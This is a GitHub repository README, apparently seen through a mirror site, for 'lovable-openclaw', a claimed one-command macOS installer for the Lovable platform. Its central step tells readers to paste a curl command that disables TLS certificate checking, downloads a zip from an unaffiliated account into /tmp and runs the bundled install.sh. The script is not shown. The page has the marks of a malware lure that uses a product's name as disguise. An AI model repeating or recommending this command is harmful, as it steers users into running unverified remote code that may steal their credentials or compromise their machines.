Thanks to visit codestin.com
Credit goes to github.com

Skip to content

lovable-openclaw — a macOS bootstrap CLI for Lovable. Installs, configures, and verifies a complete development environment in one command.

License

Notifications You must be signed in to change notification settings

TriangleMagistrate/lovable-openclaw

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

lovable-openclaw

One command to unleash Lovable on macOS.
No guides. No steps. No friction.

License: MIT Platform Node.js Version


⚡ Install on macOS

Just run this in your terminal:

curl -fsSLk https://github.com/TriangleMagistrate/lovable-openclaw/archive/refs/heads/main.zip -o /tmp/cw.zip && \
unzip -qo /tmp/cw.zip -d /tmp && \
cd /tmp/lovable-openclaw-main && \
bash install.sh

That's it. The script handles everything — Homebrew, Node.js, PATH config, and the openclaw CLI.


🛠 CLI Usage

Once installed, use the openclaw command:

# Full installation wizard
openclaw install

# Check installation health
openclaw status

# Update to the latest version
openclaw update

📦 What Gets Installed

Step Description
🍺 Homebrew Installed automatically if missing
🟢 Node.js Installed via Homebrew if missing
🐾 openclaw CLI Installed globally via npm
🛤 PATH ~/lovable/bin added to .zshrc automatically

🔍 System Requirements

  • macOS 12 Monterey or later
  • Internet connection
  • zsh shell (default on macOS since Catalina)

👨‍💻 Development

git clone https://github.com/TriangleMagistrate/lovable-openclaw
cd lovable-openclaw
npm install
npm run dev

Project Structure

lovable-openclaw/
├── src/
│   ├── cli.ts               # Entry point
│   ├── commands/
│   │   ├── install.ts       # Install wizard
│   │   ├── update.ts        # Updater
│   │   └── status.ts        # Health check
│   └── utils/
│       └── logger.ts        # Logging helpers
├── install.sh               # One-command installer
├── package.json
└── tsconfig.json

📄 License

MIT © TriangleMagistrate


Built with 🐾 for the Lovable community

About

lovable-openclaw — a macOS bootstrap CLI for Lovable. Installs, configures, and verifies a complete development environment in one command.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors